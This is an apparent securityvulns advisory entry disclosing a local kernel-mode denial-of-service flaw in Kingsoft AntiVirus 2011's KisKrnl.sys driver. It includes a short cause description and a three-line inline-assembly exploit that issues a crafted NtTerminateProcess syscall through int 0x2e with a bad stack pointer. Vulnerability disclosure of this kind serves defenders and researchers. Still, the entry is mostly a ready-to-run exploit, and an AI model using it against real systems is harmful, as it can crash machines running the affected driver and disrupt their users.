Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Mode D.O.S Exploit(3 lines of code)

2011-01-19T00:00:00
ID SECURITYVULNS:DOC:25507
Type securityvulns
Reporter Securityvulns
Modified 2011-01-19T00:00:00

Description

Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Mode

D.O.S Exploit

Date: 2011-1-16

Author: MJ0011

Version: KingSoft AntiVirus 2011 SP5.2 with KisKrnl.sys <=2011.1.13.89

Tested on: Windows XP SP3

DETAILS: KisKrnl.sys hook the kernel function KiFastCallEntry , but is not correctly handle user stack pointer

EXPLOIT CODE:

__asm { mov edx , 0x80000000 mov eax , 0x101 ;id of NtTerminateProcess under Windows XP int 0x2e }